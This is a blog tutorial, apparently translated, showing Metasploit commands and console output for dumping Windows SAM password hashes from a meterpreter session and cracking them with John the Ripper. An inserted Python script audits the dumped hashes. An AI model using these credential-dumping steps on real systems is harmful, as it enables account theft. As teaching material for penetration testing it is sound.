[METASPLOIT] HashDump and Password Crack (John the Ripper) using Metasploit

Permission rw-r--r--
Author 하훌
Date and Time 8/13/2015
Label
License Creative Commons License


In this post I want to talk about hash cracking with the Metasploit post/hashdump module and john (John the Ripper).
First, inject and run a meterpreter shell on the target PC and keep the shell connection open.

meterpreter > ls
Listing: C:\Documents and Settings\LocalService\Cookies
=======================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  16384  fil   2015-08-13 12:28:33 +0900  index.dat

meterpreter >

SAM Dump using the POST/WINDOWS/GATHER/HASHDUMP module


Here the attacker goes back to metasploit in order to use the POST module.
With the background command you can return to msf while keeping the session alive.

meterpreter > background
[*] Backgrounding session 1...
hahwul exploit(handler) #>
hahwul exploit(handler) #>


Use the windows hashdump module among the post modules to dump the SAM file.

hahwul exploit(handler) #> use post/windows/gather/hashdump 
hahwul post(hashdump) #> set session 1 
session => 1
hahwul post(hashdump) #> run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY cbda43cfe588e98549abf078ee086266...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:21ac9e2845f703fd49d14b2205b6cafe:658865617e824fc4be4ecd78969e89f4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ed4d8906fe997c250615fd2c9cac861c:::


[*] Post module execution completed
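As an added example (not code from the post or from Metasploit), here is a small audit script that parses the pwdump-format lines hashdump printed above and reports what a reviewer would flag: accounts whose NT hash is the hash of an empty password, and accounts for which a real LM hash is still stored, using the fact that LM hashes each 7-character half separately (the reason John reduces MaxLen to 7 below) to tell whether the password is at most 7 characters. The constants are the documented empty-password hashes; the sample input is the dump above.

```python
import re

# Documented constants of the Windows hash formats: LM hash of an empty
# password, LM half of an empty 7-char block, NT (MD4) hash of an empty password.
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"
LM_EMPTY_HALF = "aad3b435b51404ee"
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One pwdump line as printed by post/windows/gather/hashdump: user:RID:LM:NT:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

def audit_line(line):
    """Classify one pwdump line as (user, rid, issues); None if not a hash line."""
    m = PWDUMP_RE.match(line.strip())
    if m is None:
        return None
    lm, nt = m["lm"].lower(), m["nt"].lower()
    issues = []
    if nt == NT_EMPTY:
        issues.append("blank password")
    if lm != LM_EMPTY:
        # A real LM hash means the host still stores the legacy LM format. LM hashes
        # each 7-char half on its own, so an empty second half means <= 7 chars.
        issues.append("LM hash stored")
        if lm[16:] == LM_EMPTY_HALF:
            issues.append("password is at most 7 characters")
        else:
            issues.append("password is 8 to 14 characters")
    return m["user"], int(m["rid"]), issues

def audit_dump(text):
    """Return (user, rid, issues) for every hash line in a hashdump transcript."""
    return [r for r in map(audit_line, text.splitlines()) if r is not None]

# Sample input: the four hash lines from the hashdump output above, plus a status line.
SAMPLE_DUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:21ac9e2845f703fd49d14b2205b6cafe:658865617e824fc4be4ecd78969e89f4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ed4d8906fe997c250615fd2c9cac861c:::
"""

if __name__ == "__main__":
    for user, rid, issues in audit_dump(SAMPLE_DUMP):
        print(f"{user} (RID {rid}): {', '.join(issues) or 'no finding'}")
```

Run it against a saved hashdump transcript to get the same classification for every account; status lines such as "[*] Obtaining the boot key..." are skipped.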

PASSWORD CRACK using the JOHN THE RIPPER module


Because the dumped hashes stay in memory, they can be handed straight to the john the ripper module.
Load the jtr module and run it right away.

hahwul post(hashdump) #> use auxiliary/analyze/jtr_crack_fast
hahwul auxiliary(jtr_crack_fast) #> run

[*] Wordlist file written out to /tmp/jtrtmp20150813-12465-1bewq4x
[*] Hashes Written out to /tmp/hashes_tmp20150813-12465-130ap5v
[*] Cracking lm hashes in normal wordlist mode...
guesses: 0  time: 0:00:00:00 DONE (Thu Aug 13 14:14:32 2015)  c/s: 4630K  trying: ZITHER - TUDE
[*] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
[*] Cracking lm hashes in single mode...
guesses: 0  time: 0:00:00:06 DONE (Thu Aug 13 14:14:38 2015)  c/s: 7793K  trying: YB1900 - E1900
[*] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
[*] Cracking lm hashes in incremental mode (All4)...
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 1  time: 0:00:00:03 DONE (Thu Aug 13 14:14:41 2015)  c/s: 47858K  trying: ||V} - |||}
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
[*]                  (guest)
[*] Cracking lm hashes in incremental mode (Digits)...
Warning: MaxLen = 8 is too large for the current hash type, reduced to 7
guesses: 0  time: 0:00:00:00 DONE (Thu Aug 13 14:14:42 2015)  c/s: 38986K  trying: 9196448 - 9196495
[*] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
[*] Remaining 2 password hashes with no different salts
[*] Cracked Passwords this run:
[+] guest::2
[+] administrator::1
[+] guest::2
[+] administrator::1
[*] Cracking nt hashes in normal wordlist mode...
guesses: 0  time: 0:00:00:00 DONE (Thu Aug 13 14:14:42 2015)  c/s: 9719K  trying: z - tude
[*] Loaded 3 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
[*] Cracking nt hashes in single mode...
guesses: 0  time: 0:00:00:13 DONE (Thu Aug 13 14:14:56 2015)  c/s: 17243K  trying: zwelithini1900 - tude1900
[*] Loaded 3 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
[*] Cracking nt hashes in incremental mode (Digits)...
guesses: 0  time: 0:00:00:03 DONE (Thu Aug 13 14:14:59 2015)  c/s: 88888K  trying: 83536787 - 83536784
[*] Loaded 3 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
[*] Cracked Passwords this run:
[*] Auxiliary module execution completed


Nothing much came out of it, but if a crack succeeds you get a message of the following form.
[+] Cracked: Guest: 
[+] Cracked: TESTAAA:password 

Of course you can also install john yourself and crack with it, but when testing with metasploit I think the method above is more convenient. :)
